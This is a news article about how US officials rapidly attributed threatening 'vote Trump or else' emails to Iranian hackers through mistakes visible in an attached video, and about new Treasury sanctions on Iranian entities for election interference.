US caught Iranian hackers through 'dumb mistake'
US government analysts and private sector investigators caught Iranian hackers behind a wave of thousands of emails threatening US voters to "vote Trump or else" exceptionally fast because of amateur mistakes made in a video attached to some of the emails.
Four people familiar with the matter told Reuters that the hackers, who are not necessarily working with the Iranian government, were linked to the malicious cyber operation within days; something that usually requires months of technical analysis and supporting intelligence.
“Either they made a dumb mistake or wanted to get caught,” said an anonymous senior US government official. “We are not concerned about this activity being some kind of false flag due to other supporting evidence. This was Iran.”
The hackers tried to blur their identity, however were unable to hide all of the incriminating information, the sources said.
The video showed the hackers’ computer screen as they typed in commands and pretended to hack a voter registration system. Investigators noticed snippets of revealing computer code, including file paths, file names and an IP address.
According to the sources, security analysts found that the IP address, hosted through an online service called Worldstream, traced back to previous hacking activity from Iran.
Analysts then cross-referenced those clues left in the video with data from other intelligence streams, including communications interceptions, the government official said.
“This public disclosure of attribution to Iran by the government has been done with breakneck speed, compared to the usual process that takes months and often years,” said Dmitri Alperovitch, a co-founder and former CTO of cybersecurity company CrowdStrike.
On Wednesday, US Director of National Intelligence John Ratcliffe said Russia and Iran have both tried to interfere in the campaign for the upcoming US elections.
While the emails, which demanded recipients to support the Republican Party and vote for President Donald Trump or “we will come after you,” appeared to come from an official-looking Proud Boys email address, the address was inauthentic, security analysts said. The Proud Boys denied they were behind the messages.
The United States on Thursday slapped new sanctions on five Iranian entities for what it called "brazen attempts" to interfere with the US election.
Stepping up pressure after US intelligence pointed the finger at both Iran and Russia, the Treasury Department accused the Iranian groups of seeking to spread disinformation and division ahead of the November 3 vote.
The Treasury imposed the fresh sanctions against the Islamic Revolutionary Guard Corps (IRGC), the IRGC-Quds Force, the Bayan Rasaneh Gostar Institute, the Iranian Islamic Radio and Television Union and International Union of Virtual Media.
The groups have worked to "sow discord among the voting populace by spreading disinformation online and executing malign influence operations aimed at misleading US voters," the Treasury said.